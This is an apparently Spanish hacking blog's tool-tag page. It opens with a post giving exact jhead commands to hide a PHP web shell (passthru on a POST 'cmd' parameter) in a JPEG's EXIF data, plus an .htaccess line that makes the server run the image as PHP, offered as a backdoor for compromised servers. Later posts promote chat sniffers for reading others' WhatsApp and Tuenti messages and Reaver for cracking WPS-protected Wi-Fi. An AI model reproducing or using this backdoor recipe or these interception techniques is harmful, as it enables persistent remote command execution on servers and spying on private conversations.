Mostrando entradas con la etiqueta tools. Mostrar todas las entradas
Mostrando entradas con la etiqueta tools. Mostrar todas las entradas

jueves, 19 de abril de 2012

Ocultando codigo PHP en los metadatos de un JPG

Resulta sencillo usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor ya comprometido.


Existen varias herramientas para manipular los metadatos EXIF. Entre todos ellos una de las mejores herramientas para esto es jhead. Para empezar seleccionamos nuestra imagen JPG y miramos sus metadatos con jhead:

C:\>jhead h33z.jpg
File name    : h33z.jpg
File size    : 71384 bytes
File date    : 2012:04:17 14:31:40
Resolution   : 492 x 369
Para insertar nuestro código PHP introducimos:

C:\>jhead -ce h33z.jpg

A continuación se introduce el código PHP que queramos ocultar como por ejemplo:

  • "<?php passthru($_POST['cmd']); __halt_compiler();" -> El cual nos permite ejecutar un comando a la maquina con peticiones POST gracias a la funcion passthru.
Una vez que hemos ocultado el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos AddType en el fichero .htaccess del directorio de las imágenes. Como ejemplo:

C:\>echo AddType application/x-httpd-php .jpg >> d:\htdocs\server\images\.htaccess

Una vez hecho esto tendremos nuestra imagen ejecutando el código PHP sin problemas.
Esta técnica serviría en un servidor ya comprometido en el cual pudiéramos modificar el fichero .htaccess para que  nuestro JPG ejecutara código.

Enlace de descarga jhead: http://www.sentex.net/~mwandel/jhead/

sábado, 25 de febrero de 2012

Sniffers para Whatsapp y Tuenti Chat

Aquí os dejo dos herramientas mas o menos recientes que actúan como sniffer para captar los datos enviados por estas dos aplicaciones ya que utilizan el mismo protocolo XMPP (una tecnología de comunicación en tiempo real muy potente y utilizada actualmente) y envían todo bajo texto plano...


Tuenti Chat - Tuenti Sniffer

El chat de tuenti usa el protocolo XMPP, una potente y actual tecnología de comunicación en tiempo real muy extendida y usada en WhatsApp (aunque este usa una modificación de xmpp realmente). Cuando nos conectamos, tuenti asigna de forma aleatoria un servidor situado de 1 a 9 quedando por ejemplo xmpp1.tuenti.com.

Los mensajes enviados no van en cifrados, de modo que cualquier persona puede leerlos, obtener el userid que corresponde a que personas envían los mensajes y a que personas los reciben, y más.

Tuenti Sniffer es capaz de leer las conversaciones de tuenti que pasen por la red local.
Y es capaz también de suplantar o robar su ID y capturar los datos enviados durante la conversación en el chat de tuenti.

-Enlace para la descarga: 
(*es necesario tener instalado Java 6 JRE y la librería JPCap 0.7)



Whatsapp - Whatsapp Sniffer

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos. Whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano. Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.

WhatsAppSniffer que muestra en consola todas las conversaciones, identificadores y demás que pasan por la red cuando se está usando whatsapp. Una forma mucho mas cómoda y fácil de obtener estos datos que usando otros sniffers como wireshark.





martes, 21 de febrero de 2012

Reaver: herramienta para hackear redes wifi protegidas con WEP y WPA/WPA2 PSK mediante WPS (WiFi Protected Setup)

Hay muchas herramientas y formas de crackear redes Wifi, pero una de las formas mas efectivas contra redes WPA/WPA 2 es utilizando este programa que aprovecha la característica WPS (WiFi Protected Setup) la cual permite a los usuarios introducir un PIN de 8 dígitos para conectarse a una red segura sin tener que introducir una contraseña. Reaver implementa un ataque de fuerza bruta contra el WPS a fin de recuperar contraseñas WPA/WPA2 obteniendo el PIN para luego extraer el PSK. Reaver ha sido diseñado para ser un ataque sólido y práctico contra la WPS, y ha sido probado contra una amplia variedad de puntos de acceso e implementaciones del WPS. 

En promedio con Reaver se tendrá acceso a WPA/WPA2 en unas 4 a 10 horas, dependiendo de la de la señal Wifi. También hay que destacar que el 95% de los routers traen por defecto activado el WPS.

 -Video de demostración con Reaver:

- Mas información sobre WPS:
 http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

- Descarga:
  http://code.google.com/p/reaver-wps/

viernes, 27 de enero de 2012

Curso completo sobre Metasploit Framework


Desde offensive-security.com nos traen este completo curso sobre Metasploit llamado metaspoit unleashed y que abarca muchos aspectos, algunos son básicos que debes tener en cuenta a la hora de ejecutar Metasploit, como los requerimientos de tu maquina, pasando por su instalación, hasta tocar temas como la interacción con metasploit, como programar sobre ella y como ejecutar tu propio exploit programado con este framework.

viernes, 16 de diciembre de 2011

Listado de herramientas de esteganografía

En un paper de Pedram Hayati se puede observar este listado que incluye hasta un total de 111 herramientas de esteganografía y estegoanálisis clasificadas por categorías. El estudio se realizó desde un perspectiva forense para identificar que herramientas están disponibles en Internet y cuáles de ellas podrían ser utilizadas por diferentes organizaciones. 

Las herramientas se agrupan segun sean para imagenes (con codigo fuente disponible o no), para sonidos, para textos, para archivos de sistema y discos duros, y para archivos con diferentes extensiones como ".doc", ".jpeg", ".gz", ".exe", ".dll"...


También se incluyen herramientas para estegoanálisis.


Aqui os dejo el paper completo:
Survey of Steganography and Steganalytic Tools



Descarga del paper: http://www.pedramhayati.com/images/docs/survey_of_steganography_and_steganalytic_tools.pdf

jueves, 13 de octubre de 2011

Hackarmoury: pack de herramientas de seguridad

HackArmoury es un repositorio de aplicaciones y utilidades de seguridad que como peculiaridad y característica más importante es su facilidad de acceso.
 

Para facilitar en estas tareas, HackArmoury permite descargar el las utilidades mediante Samba, TFTP, FTP, RSync, SVN, y HTTP y HTTPS, tanto IPv4 como IPv6.
 
La lista de aplicaciones no es muy amplia, pero poco a poco imaginamos y esperamos que vaya creciendo.



Esta web me ha recordado otra realmente práctica y no excesivamente conocida; el live de sysinternals, a la que se puede acceder mediante SMB (\\live.sysinternals.com) y también dispone de un listado de directorio con todas las utilidades: http://live.sysinternals.com/


Y para finalizar, recordaros que Nirsoft tiene una herramienta llamada "NirLauncher" que facilita la descarga y actualización de sus propias aplicaciones, así como las de Sysinternals, joeware y piriform.

 
Fuente: securitybydefault.com